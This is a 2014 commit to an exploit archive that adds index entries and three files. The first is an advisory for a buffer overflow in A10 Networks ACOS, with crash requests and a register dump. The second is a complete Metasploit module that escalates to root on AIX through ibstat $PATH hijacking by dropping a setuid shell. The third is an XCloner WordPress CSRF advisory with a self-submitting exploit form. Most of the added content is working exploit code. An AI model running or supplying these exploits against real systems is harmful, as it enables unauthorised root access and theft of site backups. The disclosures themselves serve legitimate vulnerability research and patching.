Updated 04_06_2014

files.csv

@@ -29457,3 +29457,6 @@ id,file,description,date,author,platform,type,port
 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0
 32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
+32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
+32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
+32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80

platforms/hardware/dos/32702.txt

@@ -0,0 +1,132 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+ 
+=== Details ===
+
+Advisory:
+http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax/
+Affected Product: ACOS
+Version: 2.7.0-P2(build: 53)  (older versions may be affected too)
+(Tested on SoftAX[2])
+
+=== Executive Summary ===
+
+Using a specially crafted HTTP request to the administration web server,
+it is possible to exploit a lack in the user input validation.
+Successful exploitation of the vulnerability may result in remote code
+execution. Unsuccessful exploitation of the vulnerability may result in
+a Denial of Service of the administrative interface.
+
+=== Proof of Concept ===
+
+Submitting arbitrary input in the HTTP request it?s possible to cause a
+buffer overflow. If you provide an overly long ?session id? in the
+request, the web server crashes. To reproduce the crash you can send one
+of the following requests to the web server:
+
+<HTTPREQ1>
+GET
+/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
+HTTP/1.1
+Host: 192.168.1.210
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
+Firefox/20.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+</HTTPREQ1>
+
+<HTTPREQ2>
+GET
+/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
+HTTP/1.1
+Host: 192.168.1.210
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
+Firefox/20.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+<HTTPREQ2>
+
+Once the crash occurs the following is the registers state of the SoftAX
+appliance:
+
+<REGSTATE>
+rax 0×0 0
+rbx 0x1e30300 31654656
+rcx 0×6 6
+rdx 0xffffffff 4294967295
+rsi 0xcac18f12 3401682706
+rdi 0×4141414141414141 4702111234474983745
+rbp 0×4141414141414141 0×4141414141414141
+rsp 0x7fffbdf9b400 0x7fffbdf9b400
+r8 0×2000 8192
+r9 0×20 32
+r10 0×0 0
+r11 0x7f10b4cec180 139709729653120
+r12 0×0 0
+r13 0x1e30318 31654680
+r14 0x1e30300 31654656
+r15 0x1e33b58 31669080
+rip 0×524149 0×524149
+eflags 0×10246 [ PF ZF IF RF ]
+cs 0×33 51
+ss 0x2b 43
+ds 0×0 0
+es 0×0 0
+fs 0×0 0
+gs 0×0 0
+fctrl 0x37f 895
+fstat 0×0 0
+ftag 0xffff 65535
+fiseg 0×0 0
+fioff 0×0 0
+foseg 0×0 0
+fooff 0×0 0
+fop 0×0 0
+mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
+</REGSTATE>
+
+=== Solution ===
+
+To fix the A10 Networks remote Buffer Overflow you have to upgrade at
+least to version  2.7.0-p6
+
+=== Disclosure Timeline ===
+
+2013-05-11 ? A10 Networks remote Buffer Overflow discovered
+2013-05-28 ? Initial vendor notification
+2013-05-30 ? The vendor acknowledge the vulnerability (bug 128069 )
+2014-03-28 ? The vendor fixed the vulnerability[3]
+2014-04-02 ? Public advisory
+
+=== Discovered by ===
+
+Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l
+
+=== References ===
+
+[1] http://www.a10networks.com/about/technology_platform_acos.php
+[2] http://www.a10networks.com/glossary/SoftAX.php
+[3]
+https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf
+
+- -- 
+Francesco Perna
+Quantum Leap SRL
+Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)
+Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v2.0.17 (MingW32)
+Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
+ 
+iQEcBAEBAgAGBQJTO7mWAAoJEPBLO12s/SuDKi8H/A+X4zIfkcwID4zTtbx7unnD
+m48/DAVNQpVLBEAWYnu7a4I98FO4gtbHn2OkQOF5beweK6uDLQMbxrzbkufgisik
+o10n8xbsa72GsPwadNxpMEtbLozmcjH5lyXPasfQ3OZkaxptesJJbTOGGoDx5M7t
+Py0X+iBkoqqCZO5wlvWsFg2cwgjw5hexXsj4qPTEPrsILvU1bhRO46Ky7Zf1roZ+
+jtSK9WyMAtiEnpW9N/srjl71vmu9T8Bkpg8iaffq6De7DKbB0aF8x6Jx9EwAkbI5
+M8dBDIve6mbwjlWIBmvMBQxiVuXUSUNf0G6gwq++i0bPn/11m1C1XkODsJXJHhk=
+=9BkH
+-----END PGP SIGNATURE-----

platforms/linux/local/32700.rb

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      "Name" => "ibstat $PATH Privilege Escalation",
+      "Description" => %q{
+        This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
+      },
+      "Author" => [
+        "Kristian Erik Hermansen", #original author
+        "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
+        "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
+      ],
+      "References" => [
+        ["CVE", "2013-4011"],
+        ["OSVDB", "95420"],
+        ["BID", "61287"],
+        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
+        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
+      ],
+      "Platform" => ["unix"],
+      "Arch" => ARCH_CMD,
+      "Payload" => {
+        "Compat" => {
+          "PayloadType" => "cmd",
+          "RequiredCmd" => "perl"
+        }
+      },
+      "Targets" => [
+        ["IBM AIX Version 6.1", {}],
+        ["IBM AIX Version 7.1", {}]
+      ],
+      "DefaultTarget" => 1,
+      "DisclosureDate" => "Sep 24 2013"
+    ))
+
+    register_options([
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
+  end
+
+  def check
+    find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
+
+    if find_output.include?("ibstat")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Target is vulnerable.")
+    end
+
+    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+    arp_file = "#{datastore["WritableDir"]}/arp"
+    c_file = %Q^#include <stdio.h>
+
+int main()
+{
+   setreuid(0,0);
+   setregid(0,0);
+   execve("/bin/sh",NULL,NULL);
+   return 0;
+}
+^
+    arp = %Q^#!/bin/sh
+
+chown root #{root_file}
+chmod 4555 #{root_file}
+^
+
+    if gcc_installed?
+      print_status("Dropping file #{root_file}.c...")
+      write_file("#{root_file}.c", c_file)
+
+      print_status("Compiling source...")
+      cmd_exec("gcc -o #{root_file} #{root_file}.c")
+      print_status("Compilation completed")
+
+      register_file_for_cleanup("#{root_file}.c")
+    else
+      cmd_exec("cp /bin/sh #{root_file}")
+    end
+
+    register_file_for_cleanup(root_file)
+
+    print_status("Writing custom arp file...")
+    write_file(arp_file,arp)
+    register_file_for_cleanup(arp_file)
+    cmd_exec("chmod 0555 #{arp_file}")
+    print_status("Custom arp file written")
+
+    print_status("Updating $PATH environment variable...")
+    path_env = cmd_exec("echo $PATH")
+    cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
+    cmd_exec("export PATH")
+
+    print_status("Triggering vulnerablity...")
+    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")
+
+    # The $PATH variable must be restored before the payload is executed
+    # in cases where an euid root shell was gained
+    print_status("Restoring $PATH environment variable...")
+    cmd_exec("PATH=#{path_env}")
+    cmd_exec("export PATH")
+
+    cmd_exec(root_file)
+    print_status("Checking root privileges...")
+
+    if is_root?
+      print_status("Executing payload...")
+      cmd_exec(payload.encoded)
+    end
+  end
+
+  def gcc_installed?
+    print_status("Checking if gcc exists...")
+    gcc_whereis_output = cmd_exec("whereis -b gcc")
+
+    if gcc_whereis_output.include?("/")
+      print_good("gcc found!")
+      return true
+    end
+
+    print_status("gcc not found. Using /bin/sh from local system")
+    false
+  end
+
+  def is_root?
+    id_output = cmd_exec("id")
+
+    if id_output.include?("euid=0(root)")
+      print_good("Got root! (euid)")
+      return true
+    end
+    if id_output.include?("uid=0(root)")
+      print_good("Got root!")
+      return true
+    end
+
+    print_status("Exploit failed")
+    false
+  end
+
+end

platforms/php/webapps/32701.txt

@@ -0,0 +1,69 @@
+Advisory ID: HTB23206
+Product: XCloner Wordpress plugin
+Vendor: XCloner
+Vulnerable Version(s): 3.1.0 and probably prior
+Tested Version: 3.1.0
+Advisory Publication:  March 12, 2014  [without technical details]
+Vendor Notification: March 12, 2014 
+Vendor Patch: March 13, 2014 
+Public Disclosure: April 2, 2014 
+Vulnerability Type: Cross-Site Request Forgery [CWE-352]
+CVE Reference: CVE-2014-2340
+Risk Level: Low 
+CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.
+
+
+?ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340
+
+The vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.
+
+Simple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: 
+
+
+<form action="http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm" method="post" name="main">
+<input type="hidden" name="dbbackup" value="1">
+<input type="hidden" name="dbbackup_comp" value="">
+<input type="hidden" name="bname" value="backup">
+<input type="hidden" name="backupComments" value="">
+<input type="hidden" name="option" value="com_cloner">
+<input type="hidden" name="task" value="generate">
+<input type="hidden" name="boxchecked" value="0">
+<input type="hidden" name="hidemainmenu" value="0">
+<input type="hidden" name="" value="">
+<input type="submit" name="run" value="run">
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to XCloner 3.1.1
+
+More Information:
+http://www.xcloner.com/support/download/?did=9
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - ?ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.
+[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.